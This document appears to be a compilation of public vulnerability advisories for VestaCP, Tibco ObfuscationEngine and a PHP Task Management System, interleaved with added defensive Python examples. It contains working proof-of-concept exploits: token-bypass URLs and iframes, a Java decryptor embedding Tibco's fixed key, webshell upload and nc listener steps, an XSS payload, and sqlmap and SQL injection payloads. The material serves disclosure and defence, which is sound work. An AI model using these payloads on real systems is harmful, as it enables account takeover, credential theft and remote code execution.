Full Disclosure

Technical Details & Description:
================================
A session token vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
The vulnerability allows remote attackers to gain unauthenticated or unauthorized access by client-side token manipulation.

The token vulnerability is located in the function of the `LoginAs` module. Remote attackers are able to perform LoginAs
requests without a session token to preview their profiles. The attack requires user account privileges for manipulation
of the request. The admin panel allows requesting, via token, the local user accounts to log in as via account switch.
In that moment the token of the request can be removed to perform the same interaction with user privileges. This allows
access to other account information without administrative permissions. The permission approval on the login request is
insufficient regarding a misconfiguration in the token implementation (client-side).
Successful exploitation of the web vulnerability results in information disclosure, user or admin account compromise
and elevation of privileges by further exploitation.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /login/

Vulnerable Parameter(s):
[+] token

Affected Parameter(s):
[+] loginas

Proof of Concept (PoC):
=======================
The token web vulnerability can be exploited by remote attackers with simple user privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Request: Default (Download Backup)
https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190
https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190

PoC: Exploitation
https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null

PoC: Exploit
<html>
<head>
<title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title>
</head>
<body>
<iframe src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"></iframe>
</body>
</html>

--- PoC Session Logs [GET] ---
https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null
Host: vestacp.localhost:8083
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://vestacp.localhost:8083/list/user/
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: /
-
https://vestacp.localhost:8083/
Host: vestacp.localhost:8083
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://vestacp.localhost:8083/list/user/
Connection: keep-alive
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
-
Location: /list/user/
https://vestacp.localhost:8083/list/user/
Host: vestacp.localhost:8083
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://vestacp.localhost:8083/list/user/
Connection: keep-alive
Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Content-Encoding: gzip
-
Welcome - Logged in as user admin

Reference(s):
https://vestacp.localhost:8083/
https://vestacp.localhost:8083/login/
https://vestacp.localhost:8083/login/?loginas
https://vestacp.localhost:8083/list/user/

Security Risk:
==============
The security risk of the remote session vulnerability in the vestacp application is estimated as high.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
-
VestaCP 0.9.8-26 - 'backup' Information Disclosure
# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure
# Date: 2020-11-25
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://vestacp.com/
# Software Link: https://vestacp.com/install/
# Version: 0.9.8-26

Document Title:
===============
VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2238

Release Date:
=============
2020-11-25

Vulnerability Laboratory ID (VL-ID):
====================================
2238

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
Insufficient Session Validation

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls.
The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. It's free to
change, modify and redistribute source code.

(Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application.
Affected Product(s):
====================
Vesta
Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-05-04: Researcher Notification & Coordination (Security Researcher)
2020-05-05: Vendor Notification (Security Department)
2020-05-07: Vendor Response/Feedback (Security Department)
2020-**-**: Vendor Fix/Patch (Service Developer Team)
2020-**-**: Security Acknowledgements (Security Department)
2020-11-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
An insufficient session validation vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
The vulnerability allows remote attackers to gain sensitive web-application data or information without permission, authentication or authorization.

The backup url includes a token parameter for the download request on backups. The mechanism is to secure that other users can only
download the backup with the token to confirm the permission. The token is not required for the download and can be detached in the
client-side session request. The session validation of the backup download request is insufficient, validating the request without
token parameter approval. Next to that the backup uses the name of the privileges in combination with the date in a tar compressed
folder. This allows a remote attacker with low user privileges to download the backup data without permission.
Successful exploitation of the session web vulnerability results in information disclosure of the local application and dbms backup files.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /download/backup/

Vulnerable Parameter(s):
[+] token

Affected Parameter(s):
[+] backup

Proof of Concept (PoC):
=======================
The insufficient session validation vulnerability can be exploited by remote attackers with simple user privileges without user interaction.
For security demonstration or to reproduce the information disclosure issue follow the provided information and steps below to continue.

Request: Default (Download Backup)
https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4

PoC: Exploitation
https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar
https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar
https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar

PoC: Exploit
<html>
<head>
<title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure (Backup)</title>
</head>
<body>
<iframe src="https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar"></iframe>
</body>
</html>

--- PoC Session Logs [GET] ---
https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar
Host: vestacp.localhost:8083
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073;
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: application/gzip
Content-Length: 3891200
Connection: keep-alive
Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar";
Accept-Ranges: bytes

Reference(s):
https://vestacp.localhost:8083/
https://vestacp.localhost:8083/download/
https://vestacp.localhost:8083/download/backup/
https://vestacp.localhost:8083/download/backup/?backup

Security Risk:
==============
The security risk of the session validation web vulnerability in the vestacp web-application is estimated as high.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
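Both VestaCP advisories above (the `LoginAs` account switch and the backup download) describe the same server-side gap: the `token` parameter is accepted when it is absent or literally `null`, and nothing else ties the request to the caller's own privileges. The block below is an added example of the checks that close that gap; it is not VestaCP's code and VestaCP is PHP, so this is a Python model of the handlers. It binds a random token to the session, rejects missing or `null` tokens, compares in constant time, and then still enforces authorisation: only admins may switch accounts, and a backup may be downloaded only by its owner (or an admin). The `Session` class, the account list and the backup file names follow the naming in the advisories but are constructed.

```python
"""Server-side token and ownership checks for privileged panel actions.

Added example, not VestaCP's code.  It models what both advisories say is
missing: the 'loginas' switch and the backup download must refuse a request
whose token is absent or literally "null", compare the token in constant
time against the one bound to the caller's session, and still enforce
authorisation afterwards.  Session, account names and backup names are
constructed (the backup name format is the one shown in the advisory).
"""
import hmac
import re
import secrets
from typing import Optional, Tuple

USERNAME_RE = re.compile(r"[a-z][a-z0-9_-]{0,31}")
# Backups are named <user>.<YYYY-MM-DD_HH-MM-SS>.tar, so the owner is the prefix.
BACKUP_RE = re.compile(
    r"(?P<owner>[a-z][a-z0-9_-]{0,31})\.(?P<stamp>\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2})\.tar")

KNOWN_USERS = {"admin", "user"}   # constructed account list


class Session:
    """A logged-in session; the token is generated server-side and never taken from the client."""

    def __init__(self, user: str, is_admin: bool = False) -> None:
        self.user = user
        self.is_admin = is_admin
        self.token = secrets.token_hex(16)   # 32 hex chars, like the tokens in the PoC URLs


def token_is_valid(session: Session, supplied: Optional[str]) -> bool:
    """Missing, empty or "null" tokens fail; otherwise compare in constant time."""
    if not supplied or supplied == "null":
        return False
    return hmac.compare_digest(session.token, supplied)


def handle_loginas(session: Session, target: str, token: Optional[str]) -> Tuple[int, str]:
    """Account switch: valid token, then admin privilege, then a well-formed known target."""
    if not token_is_valid(session, token):
        return 403, "missing or invalid token"
    if not session.is_admin:
        return 403, "loginas requires admin privileges"
    if not USERNAME_RE.fullmatch(target) or target not in KNOWN_USERS:
        return 400, "unknown or malformed account name"
    return 302, f"/ (session switched to {target})"


def handle_backup_download(session: Session, backup: str, token: Optional[str]) -> Tuple[int, str]:
    """Backup download: valid token, well-formed name, and the caller owns it (or is admin)."""
    if not token_is_valid(session, token):
        return 403, "missing or invalid token"
    match = BACKUP_RE.fullmatch(backup)
    if match is None:
        return 400, "malformed backup name"
    if match.group("owner") != session.user and not session.is_admin:
        return 403, "backup belongs to another account"
    return 200, f'attachment; filename="{backup}"'


def demo() -> dict:
    """Replay the advisories' requests against the hardened handlers; values are HTTP status codes."""
    user = Session("user")
    admin = Session("admin", is_admin=True)
    return {
        "loginas_null_token": handle_loginas(user, "admin", "null")[0],                      # 403
        "loginas_user_valid_token": handle_loginas(user, "admin", user.token)[0],            # 403
        "loginas_admin_valid_token": handle_loginas(admin, "user", admin.token)[0],          # 302
        "loginas_malformed_target": handle_loginas(admin, "user/.admin", admin.token)[0],    # 400
        "backup_no_token": handle_backup_download(user, "user.2020-04-28_00-00-17.tar", None)[0],              # 403
        "backup_other_owner": handle_backup_download(user, "admin.2020-04-28_00-00-17.tar", user.token)[0],    # 403
        "backup_own": handle_backup_download(user, "user.2020-04-28_00-00-17.tar", user.token)[0],             # 200
        "backup_traversal_name": handle_backup_download(admin, "../../etc/passwd", admin.token)[0],            # 400
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

The ordering matters: the token check runs first so that a forged or replayed request is rejected before any user lookup, and the ownership check is separate from the token check because a valid token only proves the request came from the caller's own session, not that the caller may see another account's backup.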
-
Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Date: December 8th 2020
# Exploit Author: Tess Sluijter
# Vendor Homepage: https://www.tibco.com
# Version: 5.11x and before
# Tested on: MacOS, Linux, Windows

# Tibco password decryption exploit

## Background

Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:

1. Using a custom key.
2. Using a machine key.
3. Using a fixed key.

https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2

This write-up pertains to #3 above. Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".

## Issues

On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:

* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
* https://community.tibco.com/questions/password-encryptiondecryption
* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
* https://community.tibco.com/questions/bw6-password-decrypt
* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html

## Impact

Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!.

This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
## Instructions

Compile with:

```
javac decrypt.java
```

Examples of running, with secrets retrieved from websites and forums (the second line of each pair is the output):

```
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco
```

```java
/*
comments!
Compile with: javac decrypt.java
Run as:
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA   -> 7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP   -> tibco
*/
import java.io.ByteArrayInputStream;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

class Decrypt {
    public static void main(String[] arguments) {
        try {
            // Tibco's fixed 3DES key (24 bytes, third subkey equal to the first)
            byte[] keyBytes = {
                28, -89, -101, -111, 91, -113, 26, -70,
                98, -80, -23, -53, -118, 93, -83, -17,
                28, -89, -101, -111, 91, -113, 26, -70
            };
            String algo = "DESede/CBC/PKCS5Padding";

            // The argument is the Base64 part of the secret, i.e. everything after "#!"
            String encryptedText = arguments[0];
            byte[] message = Base64.getDecoder().decode(encryptedText);
            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);

            Cipher decipher = Cipher.getInstance(algo);
            // The first block (8 bytes for DESede) of the message is the CBC IV
            int i = decipher.getBlockSize();
            byte[] ivSetup = new byte[i];
            byteArrayInputStream.read(ivSetup);

            SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
            decipher.init(Cipher.DECRYPT_MODE, key, new IvParameterSpec(ivSetup));

            // Magic, I admit I don't understand why this is needed.
            // (The plaintext is stored as UTF-16LE: two bytes per character, low byte first,
            // so each pair of decrypted bytes is reassembled into one char below.)
            CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
            char[] plaintext;
            char[] arrayOfChar1 = new char[(message.length - i) / 2];
            byte[] arrayOfByte4 = new byte[2];
            int b = 0;
            while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
                // Mask both bytes so values >= 0x80 are not sign-extended
                arrayOfChar1[b++] = (char) (((arrayOfByte4[1] & 0xFF) << 8) | (arrayOfByte4[0] & 0xFF));
            }
            cipherInputStream.close();

            if (b == arrayOfChar1.length) {
                plaintext = arrayOfChar1;
            } else {
                // Fewer chars than the buffer (padding removed): copy them out and wipe the buffer
                char[] arrayOfChar = new char[b];
                System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
                for (b = 0; b < arrayOfChar1.length; b++) {
                    arrayOfChar1[b] = Character.MIN_VALUE;
                }
                plaintext = arrayOfChar;
                // End of Magic
            }
            System.out.println(plaintext);
        } catch (Exception ex) {
            System.out.println("Barf...");
            System.out.println(ex);
        }
    }
}
```
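Since the post states that fixed-key secrets are recognisable by their `#!` prefix and that the tool treats the rest as Base64 over an 8-byte DESede/CBC IV followed by block-aligned ciphertext, the practical follow-up for an operator is to inventory such values in their own configuration and move them to machine- or custom-key obfuscation, or to an external secret store. The block below is an added example of that scan; it is not part of the original post or of Tibco's tooling and it decrypts nothing. The sample configuration text is constructed, except that the two Base64 blobs from the post are reused as realistic input; the "shape" test (strict Base64, decoded length at least two 8-byte blocks and a multiple of 8) is an assumption derived from how the Java tool reads the value.

```python
"""Locating fixed-key obfuscated secrets in configuration text.

Added example, not part of the original post or of Tibco's tooling.  Values
obfuscated with the fixed key start with '#!' and the remainder is Base64
over an 8-byte DESede/CBC IV plus block-aligned ciphertext; this scanner
finds such values in properties, .gv or XML-style text so they can be
inventoried and rotated.  It does not decrypt anything.  SAMPLE_CONFIG is
constructed, except for the two blobs reused from the post.
"""
import base64
import binascii
import re
from typing import List, Tuple

FIXED_KEY_RE = re.compile(r"#!([A-Za-z0-9+/]+={0,2})")
DES_BLOCK = 8


def is_plausible_fixed_key_blob(b64: str) -> bool:
    """Strict Base64 whose decoded length is IV block + at least one cipher block, block-aligned."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 2 * DES_BLOCK and len(raw) % DES_BLOCK == 0


def find_fixed_key_secrets(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, setting_name, blob) for each '#!' value that passes the shape check.

    The setting name is the last token before the value (e.g. 'value' in
    'value=#!...'), which is enough to locate it in the file; '' when none.
    """
    hits: List[Tuple[int, str, str]] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in FIXED_KEY_RE.finditer(line):
            blob = match.group(1)
            if not is_plausible_fixed_key_blob(blob):
                continue
            prefix = line[: match.start()].rstrip(" \t=:\"'")
            name = prefix.split()[-1] if prefix.split() else ""
            hits.append((line_no, name, blob))
    return hits


# Constructed sample resembling a global-variable export. Lines 3 and 5 carry the
# two blobs quoted in the post; line 7 is a 15-byte value that cannot be a
# DESede/CBC message; line 8 is ordinary text that happens to contain "#!".
SAMPLE_CONFIG = """\
# constructed sample resembling a global-variable export
name=jdbc.password
value=#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
name=ems.password
value=#!BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
name=short.value
value=#!c2hvcnRzdHJpbmdoZXJl
note=hashtag #!notbase64! in a comment
"""


def demo() -> List[Tuple[int, str, str]]:
    """Scan the constructed sample; two hits are expected (lines 3 and 5)."""
    return find_fixed_key_secrets(SAMPLE_CONFIG)


if __name__ == "__main__":
    for line_no, name, blob in demo():
        print(f"line {line_no}: {name} = #!{blob[:8]}... (fixed-key obfuscated, rotate)")
```

Run it over exported `.gv`, `.properties` and deployment XML files; every hit is a credential that anyone holding the file can recover, so treat the finding like a plaintext secret in source control.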
-
Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged-in username on the header and select Manage Account.
Step 3: Upload a php payload (I used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embedded with a php payload ("exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"). Then update the profile.
Step 4: Click on the username on the header again and select Manage Account.
Step 5: Right click on the uploaded php payload or embedded image located under the "choose avatar form", then copy the image location.
Step 6: Start an nc listener and paste the url in the browser. This will trigger the remote code execution if you used a php shell. ( http://localhost/assets/uploads/1607438280_shell.php )
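The avatar upload described in Steps 3 to 6 succeeds because the application stores whatever file it receives, under a name derived from the original, inside a web-served directory. The block below is an added example of the server-side validation that prevents both variants in Step 3 (a bare `.php` file and a JPEG carrying a PHP tag in its comment segment); it is not the Task Management System's code, and since that project is PHP the checks are modelled in Python. It allowlists extensions, verifies the file's magic bytes against the declared type, scans for PHP open tags, enforces a size limit and chooses a random storage name. The sample files are constructed byte strings, not real images.

```python
"""Avatar upload validation for a web application.

Added example, not the Task Management System's code.  It applies the checks
the advisory shows are missing on the Manage Account upload: an extension
allowlist, a magic-byte check of the content against the declared image
type, a scan for an embedded PHP open tag (the advisory plants one in a
JPEG comment), a size limit, and a server-chosen random storage name.
The sample files below are constructed byte strings.
"""
import os
import secrets

# Allowed extensions mapped to the magic bytes their content must begin with.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
PHP_OPEN_TAGS = (b"<?php", b"<?=")
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised with a reason the application can log (and show generically to the user)."""


def validate_avatar(original_name: str, content: bytes) -> str:
    """Return a safe, server-chosen filename for 'content', or raise UploadRejected."""
    ext = os.path.splitext(original_name.lower())[1].lstrip(".")
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension '{ext or '(none)'}' is not an allowed image type")
    if len(content) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file exceeds size limit")
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")
    lowered = content.lower()
    if any(tag in lowered for tag in PHP_OPEN_TAGS):
        raise UploadRejected("embedded PHP open tag found in image data")
    # The original name never reaches disk: no user-controlled characters, no double extensions.
    stored_ext = "jpg" if ext == "jpeg" else ext
    return f"{secrets.token_hex(16)}.{stored_ext}"


def check(original_name: str, content: bytes) -> str:
    """Wrapper returning 'accepted:<name>' or 'rejected:<reason>' for logging and tests."""
    try:
        return "accepted:" + validate_avatar(original_name, content)
    except UploadRejected as exc:
        return "rejected:" + str(exc)


# Constructed samples (not real files): a minimal JFIF header, the same with a COM
# segment carrying a PHP tag, and a bare PHP script.
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + bytes(64) + b"\xff\xd9"
COMMENT_PHP_JPEG = b"\xff\xd8\xff\xfe\x00\x1e" + b"<?php echo 'constructed'; ?>" + bytes(32) + b"\xff\xd9"
PHP_SCRIPT = b"<?php echo 'constructed'; ?>\n"


def demo() -> dict:
    """Exercise the validator with the upload variants the advisory describes."""
    return {
        "php_by_extension": check("php-reverse-shell.php", PHP_SCRIPT),
        "php_renamed_jpg": check("shell.jpg", PHP_SCRIPT),
        "jpeg_with_comment_payload": check("r0b0t.jpg", COMMENT_PHP_JPEG),
        "clean_jpeg": check("avatar.JPEG", CLEAN_JPEG),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The content scan is a heuristic, not a guarantee: the durable controls are re-encoding every accepted image with an image library (which drops EXIF and comment segments) and storing uploads where the web server will not execute scripts, so that even a file that slips through is served as bytes rather than run as PHP.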
-
Task Management System 1.0 - 'First Name and Last Name' Stored XSS
# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged-in username on the header and select Manage Account.
Step 3: Rename the user First Name or Last Name to " <script>alert(document.domain)</script> ".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Log out and log in again and the page will display the domain name.
-
Task Management System 1.0 - 'id' SQL Injection
# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1. Log into the application with credentials.
Step 2. Click on Projects.
Step 3. Select View Projects.
Step 4. Choose any project, click on action and select view.
Step 5. Capture the request of the "page=view_project&id=" page in Burp Suite.
Step 6. Save the request and run sqlmap on the request file using the command " sqlmap -r request -p id --time-sec=5 --dbs ".
Step 7. This will inject successfully and you will have an information disclosure of all databases' contents.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=view_project&id=3 AND 5169=5169

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
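The sqlmap output above shows why the `id` parameter is injectable: the boolean-based payload `3 AND 5169=5169` returns the project while the same request with a false condition would not, which means the parameter is being spliced into the SQL statement as text. The block below is an added example, not the Task Management System's code (that project uses PHP/MySQLi; this uses Python's `sqlite3` so it runs stand-alone against a constructed in-memory table). It places the string-concatenated query beside the hardened version, which validates the parameter as a decimal integer and binds it, and runs both against the advisory's payload.

```python
"""The 'view_project' lookup, vulnerable and hardened, run against the
advisory's boolean-based payload.

Added example, not the Task Management System's code (that project is
PHP/MySQLi; this uses Python's sqlite3 so it runs stand-alone with a
constructed in-memory table).  The vulnerable function builds SQL by string
concatenation, which is why 'id=3 AND 5169=5169' and 'id=3 AND 5169=5170'
give different results and so hand sqlmap its true/false oracle.  The
hardened function validates the type and binds the value as a parameter.
"""
import re
import sqlite3

DIGITS_ONLY = re.compile(r"[0-9]{1,10}")


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the application's projects table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projects (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO projects VALUES (?, ?)",
                     [(1, "Alpha"), (2, "Beta"), (3, "Gamma")])
    return conn


def view_project_vulnerable(conn: sqlite3.Connection, project_id: str) -> list:
    """The request parameter is spliced into the statement: it becomes SQL, not data."""
    sql = "SELECT id, name FROM projects WHERE id = " + project_id
    return conn.execute(sql).fetchall()


def view_project_safe(conn: sqlite3.Connection, project_id: str) -> list:
    """Strict syntactic validation, then a bound parameter; the value can never be parsed as SQL."""
    if not DIGITS_ONLY.fullmatch(project_id):
        raise ValueError("id must be a decimal integer")
    return conn.execute("SELECT id, name FROM projects WHERE id = ?",
                        (int(project_id),)).fetchall()


def demo() -> dict:
    """Run both variants against a true and a false boolean payload and a plain id."""
    conn = make_db()
    true_payload = "3 AND 5169=5169"     # from the advisory's sqlmap output
    false_payload = "3 AND 5169=5170"    # constructed: same shape, false condition
    results = {
        "vulnerable_true_condition": view_project_vulnerable(conn, true_payload),
        "vulnerable_false_condition": view_project_vulnerable(conn, false_payload),
        "safe_plain_id": view_project_safe(conn, "3"),
    }
    try:
        view_project_safe(conn, true_payload)
        results["safe_payload"] = "accepted"
    except ValueError:
        results["safe_payload"] = "rejected"
    conn.close()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The binding is what removes the injection; the integer check in front of it is defence in depth that also gives the application a clean 400 response and a log line for requests shaped like the payloads above, which is the detection hook a defender would want on this endpoint.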